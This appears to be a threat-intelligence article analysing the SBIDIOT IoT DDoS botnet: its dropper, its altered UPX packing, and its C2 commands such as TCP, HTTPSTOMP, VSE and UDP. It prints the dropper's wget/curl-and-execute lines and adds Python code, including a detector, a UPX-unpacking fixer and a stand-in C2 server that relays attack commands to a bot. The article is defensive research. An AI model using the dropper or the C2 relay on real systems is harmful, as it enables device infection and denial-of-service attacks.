Threat Intelligence: Analysis of the SBIDIOT IoT Malware

There are billions of IoT connections in the world and more than 70 percent of them are in the industrial sector. This is why Nozomi Networks Labs regularly reviews the threat landscape for IoT devices. Recently, a malware sample named SBIDIOT caught our attention. It had a relatively low number of detections on VirusTotal, and its commands, in their current form, were not well documented by the cybersecurity community.

We decided to analyze SBIDIOT and uncovered how it communicates with targets and what types of commands it supports. This information helps detect the threat and allows defenders to stop or mitigate it before harmful impacts occur. The main potential impact of DDoS (Distributed Denial of Service) botnets is the generation of excessively high loads on targeted servers, preventing users from accessing services and thus harming normal business operations.

To avoid impacts, early detection is vital. Detection can be done by your security team (see the malware indicators at the end of this article) or by using a network monitoring and threat intelligence solution such as ours.

Analysis of SBIDIOT Malware

Based on our information, at least one way the malware propagates is by exploiting an RCE vulnerability in ZTE routers. For older versions, we observed a shell script, delivered to victim machines by various means, that downloads and executes the architecture-specific binary payloads:

#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/x86; curl -O http:///SBIDIOT/x86; cat x86 >SSH; chmod +x *; ./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mips; curl -O http:///SBIDIOT/mips; cat mips >SSH; chmod +x *; ./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/mpsl; curl -O http:///SBIDIOT/mpsl; cat mpsl >SSH; chmod +x *; ./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http:///SBIDIOT/arm; curl -O http:///SBIDIOT/arm; cat arm >SSH; chmod +x *; ./SSH SSH
...
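The dropper above has a recognizable shape: a chain of writable directories, the same payload fetched with both wget and curl, one file per CPU architecture, the binary renamed to SSH, chmod +x on a glob, and execution with a spoofed argv[0]. The following detection logic is an added example written for this article and is not code from Nozomi Networks Labs. The sample script it scans is constructed (the page elides the download host, so c2.invalid stands in for it), and the indicator names and scoring threshold are choices of this example, not something the page specifies.

```python
import re

# Constructed stand-in for the dropper shown above; the host is a placeholder.
SAMPLE_SCRIPT = r"""#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://c2.invalid/SBIDIOT/x86; curl -O http://c2.invalid/SBIDIOT/x86; cat x86 >SSH; chmod +x *; ./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://c2.invalid/SBIDIOT/mips; curl -O http://c2.invalid/SBIDIOT/mips; cat mips >SSH; chmod +x *; ./SSH SSH
"""

# Constructed benign installer, used to check the scorer does not fire on
# ordinary "cd && curl" patterns.
BENIGN_SCRIPT = """#!/bin/sh
cd /opt/app || exit 1
curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz
tar xzf release.tar.gz
"""

# One regex per dropper behaviour. Each is scored independently so that a
# single coincidence (a legitimate "chmod +x", say) cannot trigger on its own.
INDICATORS = {
    # falls through a list of usually-writable directories
    "writable_dir_chain": re.compile(r"cd\s+/tmp\s*\|\|\s*cd\s+/var/run\s*\|\|"),
    # fetches the same URL with wget and then curl, whichever is present
    "fetch_wget_and_curl": re.compile(r"wget\s+\S+;\s*curl\s+-O\s+\S+"),
    # per-architecture payload names typical of Mirai/Gafgyt-style droppers
    "multi_arch_payload": re.compile(r"/(x86|mips|mpsl|arm\w*|ppc|sh4|m68k|spc)\b"),
    # copies the payload to a benign-looking name
    "rename_to_ssh": re.compile(r"cat\s+\w+\s*>\s*SSH\b"),
    # marks everything in the directory executable
    "chmod_glob": re.compile(r"chmod\s+\+x\s+\*"),
    # runs the payload with argv[0] set to "SSH" to blend into process lists
    "exec_with_argv0": re.compile(r"\./SSH\s+SSH"),
}


def score_script(text: str) -> dict:
    """Return {indicator_name: number_of_hits} for a shell script body."""
    return {name: len(rx.findall(text)) for name, rx in INDICATORS.items()}


def is_iot_dropper(text: str, min_indicators: int = 3) -> bool:
    """True when at least min_indicators distinct behaviours are present."""
    hits = score_script(text)
    return sum(1 for count in hits.values() if count) >= min_indicators


if __name__ == "__main__":
    for label, body in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, is_iot_dropper(body), score_script(body))
```

The threshold of three distinct indicators is deliberately conservative; a production rule would be fed from the proxy or EDR script capture and tuned against the local baseline.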

The sample e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9 is packed with the standard UPX tool, but its UPX header was subsequently modified. The malware remains executable, yet it can no longer be unpacked with the same tool straight away:

$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
upx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: NotPacked Exception: not packed by UPX

Unpacked 0 files.

As we can see here, the UPX! signature was replaced with a custom YTS\x99 signature:

Hex dump showing that the “UPX!” string has been replaced.

Restoring it back will enable us to unpack the sample using the standard UPX tool:

$ perl -pi -e 's/YTS\x99/UPX!/g' e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     55372 <-     30024   54.22%   linux/i386   e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9

Unpacked 1 file.
$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
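The perl one-liner works once you already know the replacement tag. The next sample from the same crew may use a different one, so it is worth automating the guess. The script below is an added example written for this article, not a tool from Nozomi Networks Labs or the UPX project. It assumes the layout of UPX's l_info header (checksum, magic, lsize, version, format) sitting immediately after the ELF program header table, which is what the hex dump of this linux/i386 sample shows; for other formats, confirm the offset against your own hex dump before trusting the guess. The "packed" file it builds for demonstration is constructed, not the real binary.

```python
import struct
from typing import Optional, Tuple

UPX_MAGIC = b"UPX!"


def _elf32_lsb_phdr_end(data: bytes) -> int:
    """Offset just past the program header table of an ELF32 little-endian file."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:   # EI_CLASS, EI_DATA
        raise ValueError("not a 32-bit little-endian ELF")
    e_phoff = struct.unpack_from("<I", data, 0x1C)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x2A)
    return e_phoff + e_phnum * e_phentsize


def guess_packer_magic(data: bytes) -> bytes:
    """Read the 4-byte tag from the l_magic slot of UPX's l_info header.

    Assumption (matches the linux/i386 layout of the sample): l_info
    {checksum[4], magic[4], lsize[2], version[1], format[1]} follows the
    program headers directly, so the magic lives 4 bytes past that point.
    """
    l_info = _elf32_lsb_phdr_end(data)
    tag = data[l_info + 4 : l_info + 8]
    if len(tag) != 4:
        raise ValueError("file too short to hold an l_info header")
    return tag


def restore_upx_magic(data: bytes, fake_magic: Optional[bytes] = None,
                      min_occurrences: int = 2) -> Tuple[bytes, int]:
    """Swap a custom packer tag back to 'UPX!' so stock `upx -d` accepts the file.

    Returns (patched_bytes, replacements). UPX writes its magic both in l_info
    and in the PackHeader trailer, so a guessed tag that occurs fewer than
    min_occurrences times is probably wrong; refuse rather than corrupt the file.
    """
    fake = fake_magic if fake_magic is not None else guess_packer_magic(data)
    if fake == UPX_MAGIC:
        return data, 0                      # nothing was tampered with
    hits = data.count(fake)
    if hits < min_occurrences:
        raise ValueError(f"tag {fake!r} seen {hits} time(s); not treating it as packer magic")
    return data.replace(fake, UPX_MAGIC), hits


def build_fake_packed_elf(tag: bytes) -> bytes:
    """Constructed stand-in for a packed sample (not the real binary): ELF32
    header, two empty program headers, an l_info block carrying `tag`, filler,
    and a trailer that repeats `tag` where the PackHeader would be."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8       # ELFCLASS32, ELFDATA2LSB
    ehdr = e_ident + struct.pack("<HHIIIIIHHHHHH",
                                 2, 3, 1, 0x400000,   # e_type, e_machine (i386), e_version, e_entry
                                 52, 0, 0,            # e_phoff, e_shoff (none), e_flags
                                 52, 32, 2,           # e_ehsize, e_phentsize, e_phnum
                                 0, 0, 0)             # no section headers
    phdrs = b"\x00" * (32 * 2)
    l_info = b"\x00" * 4 + tag + b"\x00" * 4
    body = b"\xaa" * 64
    trailer = tag + b"\x00" * 28
    return ehdr + phdrs + l_info + body + trailer


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:                 # usage: python3 fixupx.py <packed_file>
        blob = open(sys.argv[1], "rb").read()
        fixed, n = restore_upx_magic(blob)
        open(sys.argv[1] + ".upx", "wb").write(fixed)
        print(f"replaced {guess_packer_magic(blob)!r} x{n}; now run: upx -d {sys.argv[1]}.upx")
    else:
        sample = build_fake_packed_elf(b"YTS\x99")
        print(guess_packer_magic(sample), restore_upx_magic(sample)[1])
```

Restoring the magic only defeats this one-byte-level trick; if `upx -d` still refuses the file afterwards, the packer stub or the PackHeader checksum has been altered as well and the sample will need to be dumped from memory instead.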

The analysis reveals characteristics quite common for this type of threat. There is a strong focus on DDoS, and parts of the code are shared with other malware families such as Gafgyt.

Given that the sample is statically linked and stripped, which is almost always the case with malware targeting IoT, the next step was to load FLIRT signatures for uClibc to make analysis easier. uClibc is a compact C library commonly used in Linux kernel-based embedded devices, which is also commonly used by IoT malware developers for easy cross-compilation, as popularized with Mirai. FLIRT signatures are essentially a method that reverse engineering tools like IDA use to pattern-match known libraries, which can greatly speed up the analysis process.

A large number of functions are recognized using FLIRT.

Upon execution, the sample attempts to connect to its C2, which in this case is an IP address and port hard-coded into the binary. Although the C2 infrastructure was not operational during the time of the investigation, we were able to force the sample to talk to our own server as its C2. Coupled with some static analysis, this was enough to quickly figure out the protocol and begin interaction.

The function responsible for handling commands compares each command received from the C2 against the following strings:

  • TCP
  • HTTPSTOMP
  • VSE
  • HEX
  • STD
  • VOX
  • NFO
  • UDP
  • UDPH
  • R6
  • FN
  • OVHKILL
  • NFOKILL
  • STOP
  • Stop
  • stop

Then, based on the results, it performs several validation checks on its arguments before executing the actual command.

Commands Supported by SBIDIOT

TCP

The TCP command asks the bot to send TCP segments destined for a specified host/port combination for a specified interval of time. Additionally, it allows the operator to set a number of optional TCP flags.

Custom TCP flags supported in the TCP command handler.

HTTPSTOMP

As arguments, it takes an HTTP method, a host/port combination, an attack duration and a request count specifying how many times to repeat the operation. Until either the attack duration or the request count is exceeded, the handler keeps issuing HTTP requests with the settings provided and a randomly selected user-agent string.

Hard-coded list of user-agent strings.
HTTPSTOMP command handler.

Additionally, another function is called to perform HTTP requests to the /cdn-cgi/l/chk_captcha URI of a hostname/port combo with, once again, a configurable attack duration and request count. This is done in an attempt to circumvent CloudFlare protection mechanisms.

VSE

Another command used for DDoS, which, depending on the arguments provided, employs either UDP or RAW sockets. Again, arguments for the target and attack duration can be provided, but additionally, the attacker can specify a pause interval between packets delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE command to target servers running the Valve Source Engine.

Code snippet from VSE command handler implementing pause interval.

VOX

The VOX command takes a host, a port and an attack duration as its arguments and then sends UDP datagrams with one of three randomly selected hard-coded payloads.

Recorded malicious UDP traffic containing hardcoded payloads.

UDP

The UDP command takes a target host, a port, an attack duration and a maximum size for the generated payload. The actual payload may be shorter than requested, because the handler measures its buffer with strlen, which counts bytes only up to the first null byte.

Command handler validating UDP arguments.

HEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH

All of the above commands call the same function, which receives a host name, a port and an attack duration, then starts generating UDP traffic with a fixed payload.

Code diagram with several code blocks pointing to the same function.

STOP/stop/Stop

This command sends SIGKILL to every process ID the bot is currently tracking, giving the operator a way to terminate the attack children the process has spawned.

STOP command handler.
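When the C2 is down, as it was during this investigation, the quickest way to exercise the handlers above is a stand-in server that the sample is redirected to. The code below is an added example written for this article, not Nozomi Networks Labs' harness and not code from the malware. It mirrors the dispatch table and the argument checks described in this section (the command names, the three spellings of STOP, the eight commands that share one fixed-payload UDP routine, and the strlen caveat of the UDP handler), but the wire format it assumes (one space-separated ASCII line per command, newline-terminated) and the listening port are assumptions of the example; the page does not document the framing.

```python
import socket
import sys
from dataclasses import dataclass
from typing import Tuple

# Command strings from the dispatch table in the text. Every name in
# UDP_FIXED_PAYLOAD resolves to the same handler in the sample.
UDP_FIXED_PAYLOAD = ("HEX", "STD", "R6", "NFO", "FN", "OVHKILL", "NFOKILL", "UDPH")
STOP_VARIANTS = ("STOP", "Stop", "stop")
ATTACKS = ("TCP", "HTTPSTOMP", "VSE", "VOX", "UDP") + UDP_FIXED_PAYLOAD


@dataclass(frozen=True)
class Task:
    handler: str              # which bot routine the command resolves to
    host: str
    port: int
    duration: int             # seconds
    extra: Tuple[str, ...]    # handler-specific trailing args (TCP flags, HTTP method, ...)


def _port(s: str) -> int:
    p = int(s)
    if not 1 <= p <= 65535:
        raise ValueError(f"port out of range: {p}")
    return p


def _duration(s: str) -> int:
    d = int(s)
    if d <= 0:
        raise ValueError(f"duration must be positive: {d}")
    return d


def parse_command(line: str) -> Task:
    """Resolve one C2 line to the handler the bot would run.

    Assumed wire format: 'CMD host port duration [extra...]'. Matching is exact,
    so only the three STOP spellings in the table are recognised as a stop.
    """
    parts = line.split()
    if not parts:
        raise ValueError("empty command")
    cmd, args = parts[0], parts[1:]
    if cmd in STOP_VARIANTS:
        return Task("stop", "", 0, 0, ())
    if cmd not in ATTACKS:
        raise ValueError(f"unknown command: {cmd}")
    if len(args) < 3:
        raise ValueError(f"{cmd} needs host, port and duration")
    host, port, duration = args[0], _port(args[1]), _duration(args[2])
    handler = "udp_fixed_payload" if cmd in UDP_FIXED_PAYLOAD else cmd.lower()
    return Task(handler, host, port, duration, tuple(args[3:]))


def effective_udp_len(buffer: bytes, max_size: int) -> int:
    """Model the strlen() caveat of the UDP handler: the bot measures its buffer
    up to the first NUL, so the datagram can be shorter than the requested max."""
    return min(max_size, len(buffer.split(b"\0", 1)[0]))


def serve(bind: str = "0.0.0.0", port: int = 1337) -> None:
    """Lab stand-in C2: accept the redirected bot, then relay operator lines
    that pass parse_command(). Newline framing is an assumption of this example."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        bot, peer = srv.accept()
        print(f"bot connected from {peer}", file=sys.stderr)
        with bot:
            for line in sys.stdin:
                try:
                    task = parse_command(line)
                except ValueError as err:
                    print(f"rejected: {err}", file=sys.stderr)
                    continue
                bot.sendall(line.strip().encode() + b"\n")
                print(f"sent -> {task}", file=sys.stderr)


if __name__ == "__main__":
    serve(port=int(sys.argv[1]) if len(sys.argv) > 1 else 1337)
```

Run it in an isolated lab network with the sample's hard-coded C2 address routed to the analysis host, and always finish a session with a STOP so the attack threads are killed before the VM is snapshotted.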

Threat Intelligence is Needed to Defend Industrial Systems from IoT Malware

As the number of Internet-connected devices increases at a rate of more than 130 percent a year [1], the threat landscape also rapidly evolves. New families of malware and modifications of existing ones emerge regularly. And, regardless of their complexity and sophistication, they all pose a threat.

To defend against threats to IoT devices that could impact production, uptime and possibly safety, automated tools can help. OT/IoT network monitoring paired with regularly updated threat intelligence identifies indicators of compromise and anomalous behavior, giving you the opportunity to act before harm occurs.

Nozomi Networks Labs is committed to providing real-time information on IoT threats as they continue to increase in prevalence and significance for operational technology environments – stay-tuned for ongoing updates.

For indicators of SBIDIOT malware, see the information provided at the end of this page.

References

  1. “The Internet of Things: Consumer, Industrial & Public Services 2020-2024,” Juniper Networks, March 31, 2020.